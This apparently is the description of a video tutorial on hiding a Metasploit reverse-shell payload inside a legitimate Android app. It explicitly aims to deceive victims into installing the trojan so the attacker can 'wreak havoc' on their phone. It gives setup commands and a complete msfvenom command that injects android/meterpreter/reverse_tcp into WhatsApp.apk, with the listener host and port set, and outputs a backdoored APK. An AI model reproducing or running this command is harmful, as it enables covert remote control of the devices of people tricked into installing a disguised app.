Hey Guys, In this video i show you how to Embed a Metasploit Payload in an Original .Apk File.
Normally we have to install the payload in the victims phone by any means we can, and when the victim runs the application, we would get a direct connection to our victim’s phone remotely and we can use it to wreak havoc on that phone.
But since the app doesn’t look very legit, takes up only a few kBs, and doesn’t show anything when clicked on, the victim will probably uninstall it right away, or worse, wouldn’t install it at all. So we have to solve that problem.
apt-get install lib32stdc++6 lib32ncurses5 lib32z1 apktool
msfvenom -x WhatsApp.apk -p android/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=4895 -o WhatsApp-backdoored.apk